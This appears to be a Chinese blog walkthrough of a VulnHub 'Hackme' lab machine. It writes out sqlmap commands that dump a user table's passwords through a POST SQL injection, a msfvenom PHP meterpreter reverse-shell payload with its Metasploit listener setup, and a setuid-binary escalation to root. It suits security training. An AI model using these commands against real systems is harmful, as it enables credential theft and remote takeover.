本文详述了一次针对Hackme靶机的渗透测试过程,包括Nmap端口扫描、发现Web服务、SQL注入利用、获取数据库信息、上传木马反弹shell、最终提权至root权限。通过弱口令尝试、sqlmap工具以及msfvenom生成木马,成功拿下靶机。
Hackme靶机
目的:拿到root权限
下载地址: https://www.vulnhub.com/entry/hackme-1,330/
https://www.vulnhub.com/entry/hackme-1,330/
选择第二个mirror
Vm打开,网络模式我选择的是nat
开整
Kali ip地址:192.168.192.129
Nmap扫描:
1,2,254地址为网卡地址
192.168.192.130即为靶机地址
扫描靶机端口
开启了80端口httpd服务,22端口ssh服务
扫一下目录:
发现uploads目录,目测可能有文件上传漏洞
打开靶机网站
尝试弱密码登陆,失败了。。。。。。。!
先注册admin登陆一下
登陆后search一下
测试一下是否有sql注入点
判断具有sql注入,而且根据头部判断还是post注入
可以手工注入,也可以sqlmap,这里使用sqlmap
先抓包
保存成txt文本
Sqlmap工具
sqlmap -r /home/kali/Desktop/bp.txt -p search --dbs -r:指定文件
-p:指定参数
--dbs:数据库
爆表(webapphacking)
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking –tables
爆字段
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users –columns
爆密码
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users -C name,pasword –dump
这个superadmin 的密码才是我想要的
Superadmin登陆,发现有上传点
上传的目录刚好是uploads,经过测试没有任何过滤,php可上传
直接上传反弹shell木马,
利用msfvenom平台生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.192.129 lport=7777 R > shell3.php(防止没有权限执行)
chmod 777 shell3.phpkali开启msfconsole平台
1 使用handler监听模块
msf > use exploit/multi/handler2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcpPAYLOAD =>php/meterpreter/reverse_tcp
3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.192.129LHOST =>192.168.192.129
4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 7777LPORT => 7777
5 发动攻击
msfexploit(multi/handler) > exploit
注:再exploit之前要远程访问你上传的后门文件 ,并监听
攻击前监听端口
上传shell3.php,在执行该文件
开始攻击,成功反弹,开启shell,
Whoami查看当前工作用户,uname -a查看操作系统
切换home目录
发现hackme没啥东西,在legacy目录下有个bash执行文件
./touchmenot
执行该文件,发现提权成功
3709
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
